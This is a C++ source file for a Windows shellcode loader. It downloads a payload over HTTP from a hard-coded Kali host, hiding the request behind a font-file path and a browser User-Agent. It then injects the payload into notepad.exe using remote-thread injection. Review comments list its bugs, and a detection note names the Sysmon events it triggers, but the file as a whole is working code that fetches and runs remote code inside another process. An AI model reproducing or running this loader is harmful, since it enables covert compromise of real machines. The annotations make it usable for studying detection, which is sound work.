
Process Injection C++

#include <windows.h>
#include <wininet.h>
#include <tlhelp32.h>
#include <stdio.h>

#pragma comment (lib, "Wininet.lib")


// Raw bytes handed from Download() to Inject(). Passive aggregate: no ownership
// semantics are encoded in the type — pcData is malloc/realloc memory that nothing
// in this file ever frees.
struct Shellcode {
    BYTE* pcData; // start of the downloaded bytes (heap, from malloc/realloc in Download)
    DWORD dwSize; // number of valid bytes at pcData
};


// The three stages main() runs in order: pick a target PID, fetch the bytes over
// HTTP, write them into the target and start a thread there. Each returns 0 on
// failure (BOOL here is used as 0/1, not TRUE/FALSE).
DWORD GetTargetPID();
BOOL Download(LPCWSTR host, INTERNET_PORT port, Shellcode* shellcode);
BOOL Inject(DWORD dwPID, Shellcode shellcode);


// Entry point. Exit codes: 1 = no target process running, 2 = download failed,
// 3 = injection failed, 0 = remote thread was created.
int main() {
    //::ShowWindow(::GetConsoleWindow(), SW_HIDE); // hide console window

    DWORD pid = GetTargetPID();
    if (pid == 0) { return 1; }

    // Filled in by Download(); left uninitialized here, so it must not be read
    // on the failure path. pcData is heap memory that is never freed (process
    // exit reclaims it).
    struct Shellcode shellcode;
    // Hard-coded plaintext HTTP source: the host name and port are static
    // network indicators, and nothing verifies what comes back before it is
    // executed in the target.
    if (!Download(L"kali.dnstest.local", 80, &shellcode)) { return 2; }

    //printf("Injecting %ld bytes into PID %ld\n", shellcode.dwSize, pid);
    if (!Inject(pid, shellcode)) { return 3; }

    return 0;
}

// ------ Getting the shellcode ------ //

// Fetches the payload with WinINet over plain HTTP from host:port and returns it
// through *shellcode (malloc'd buffer + byte count). Returns 1 on success, 0 if
// the request never succeeds or a read fails. The fixed User-Agent string, the
// GET path and the caller's host name are static network indicators; the body
// is not authenticated or integrity-checked.
BOOL Download(LPCWSTR host, INTERNET_PORT port, Shellcode* shellcode) {
    HINTERNET session = InternetOpen(
        L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36",
        INTERNET_OPEN_TYPE_PRECONFIG,
        NULL,
        NULL,
        0);
    // NOTE(review): session is not checked for NULL before use.

    HINTERNET connection = InternetConnect(
        session,
        host,
        port,
        L"",
        L"",
        INTERNET_SERVICE_HTTP,
        0,
        0);
    // NOTE(review): connection is not checked for NULL before use.

    HINTERNET request = HttpOpenRequest(
        connection,
        L"GET",
        L"/fontawesome.woff",
        NULL,
        NULL,
        NULL,
        0,
        0);
    // NOTE(review): request is not checked for NULL before use.

    // Up to three attempts with a 3 s pause between them. Returning from inside
    // this loop leaks the three WinINet handles opened above.
    WORD counter = 0;
    while (!HttpSendRequest(request, NULL, 0, 0, 0)) {
        counter++;
        Sleep(3000);
        if (counter >= 3) {
            return 0; // HTTP requests eventually failed
        }
    }

    // Read chunk buffer (BUFSIZ comes from <stdio.h>). Allocated with new[] and
    // never delete[]'d on any path.
    DWORD bufSize = BUFSIZ;
    BYTE* buffer = new BYTE[bufSize];

    // Growable accumulation buffer, doubled whenever the next chunk would not fit.
    DWORD capacity = bufSize;
    BYTE* payload = (BYTE*)malloc(capacity);
    // NOTE(review): malloc result is not checked for NULL.

    DWORD payloadSize = 0;

    while (true) {
        DWORD bytesRead;

        if (!InternetReadFile(request, buffer, bufSize, &bytesRead)) {
            return 0; // leaks payload, buffer and the three handles
        }

        if (bytesRead == 0) break; // end of response body

        // One doubling is always enough: bytesRead <= bufSize <= capacity.
        if (payloadSize + bytesRead > capacity) {
            capacity *= 2;
            BYTE* newPayload = (BYTE*)realloc(payload, capacity);
            // NOTE(review): a NULL from realloc is stored unchecked, losing the
            // old block and dereferencing NULL in the copy loop below.
            payload = newPayload;
        }

        for (DWORD i = 0; i < bytesRead; i++) {
            payload[payloadSize++] = buffer[i];
        }

    }
    // Intended to shrink the block to the exact size, but the result is dropped:
    // if realloc moved the block, `payload` (returned to the caller below) now
    // points at freed memory. With an empty body this is realloc(payload, 0),
    // whose behaviour is implementation-defined.
    BYTE* newPayload = (BYTE*)realloc(payload, payloadSize);

    InternetCloseHandle(request);
    InternetCloseHandle(connection);
    InternetCloseHandle(session);

    (*shellcode).pcData = payload;
    (*shellcode).dwSize = payloadSize;
    return 1;
}

// ------ Finding a target process ------ //

// Target selection helpers: resolve a list of image names, or a single image
// name, to the PID of the first matching running process (0 if none).
DWORD GetFirstPIDProclist(const WCHAR** aszProclist, DWORD dwSize);
DWORD GetFirstPIDProcname(const WCHAR* szProcname);

// Picks the injection target by image name from a fixed candidate list; returns
// 0 if none of the candidates is running.
// NOTE(review): the array is declared with 2 slots but has only one initializer
// (the second entry was commented out), so aszProclist[1] is a null pointer and
// the sizeof-based count still passes 2. If notepad.exe is not running, that
// null reaches lstrcmpiW inside GetFirstPIDProcname.
DWORD GetTargetPID() {
    const WCHAR* aszProclist[2] = {
        L"notepad.exe",
        //L"msedge.exe"
    };
    return GetFirstPIDProclist(aszProclist, sizeof(aszProclist) / sizeof(aszProclist[0]));
}

// Walks the candidate names in order and stops at the first one that resolves
// to a running process. Returns that PID, or 0 when no name in the list matched.
DWORD GetFirstPIDProclist(const WCHAR** aszProclist, DWORD dwSize) {
    for (DWORD idx = 0; idx < dwSize; ++idx) {
        const DWORD found = GetFirstPIDProcname(aszProclist[idx]);
        if (found != 0) return found;
    }
    return 0;
}

// Returns the PID of the first process in a Toolhelp snapshot whose image name
// equals szProcname (case-insensitive, lstrcmpiW), or 0 if there is no match or
// the snapshot cannot be taken.
DWORD GetFirstPIDProcname(const WCHAR* szProcname) {
    HANDLE hProcessSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (INVALID_HANDLE_VALUE == hProcessSnapshot) return 0;

    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(PROCESSENTRY32); // must be set before Process32First
    if (!Process32First(hProcessSnapshot, &pe32)) {
        CloseHandle(hProcessSnapshot);
        return 0;
    }

    // NOTE(review): the entry filled by Process32First is never compared — the
    // loop only looks at entries returned by Process32Next, so the first entry
    // of the snapshot is skipped.
    DWORD pid = 0;
    while (Process32Next(hProcessSnapshot, &pe32)) {
        if (lstrcmpiW(szProcname, pe32.szExeFile) == 0) {
            pid = pe32.th32ProcessID;
            //printf("Process found: %d %ls\n", pid, pe32.szExeFile);
            break;
        }
    }

    CloseHandle(hProcessSnapshot);
    return pid;
}

// ------ Injecting into process ------ //

// Remote-thread injection: open the target, allocate an executable region in it,
// copy the bytes over, start a thread at that address. Returns 1 if the remote
// thread was created, 0 on any earlier failure. shellcode.pcData is not freed.
// Detection note: this API sequence on a foreign PID — OpenProcess with
// PROCESS_VM_WRITE|PROCESS_CREATE_THREAD, VirtualAllocEx of an RX region,
// WriteProcessMemory, CreateRemoteThread — is what Sysmon Event ID 10
// (ProcessAccess) and Event ID 8 (CreateRemoteThread) record, and a private
// executable region with no backing image is a standard memory-scan finding.
BOOL Inject(DWORD dwPID, Shellcode shellcode) {
    HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD, FALSE, dwPID);
    if (!hProcess) { return 0; }; // trailing ';' is an empty statement, harmless

    // Region is allocated PAGE_EXECUTE_READ up front, sized to the payload.
    LPVOID pRemoteAddr = VirtualAllocEx(hProcess, NULL, shellcode.dwSize, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READ);
    if (!pRemoteAddr) {
        CloseHandle(hProcess);
        return 0;
    };

    // Failure paths close the process handle but leave the remote allocation in
    // place (no VirtualFreeEx).
    if (!WriteProcessMemory(hProcess, pRemoteAddr, shellcode.pcData, shellcode.dwSize, NULL)) {
        CloseHandle(hProcess);
        return 0;
    };

    // Thread entry is the remote buffer itself, with no argument. The 500 ms
    // wait is a timeout, not a completion check: the function returns 1 whether
    // or not the thread has finished, and closing the handles does not stop it.
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteAddr, NULL, 0, NULL);
    if (hThread != NULL) {
        WaitForSingleObject(hThread, 500);

        CloseHandle(hThread);
        CloseHandle(hProcess);
        return 1;
    }

    CloseHandle(hProcess);
    return 0;
}
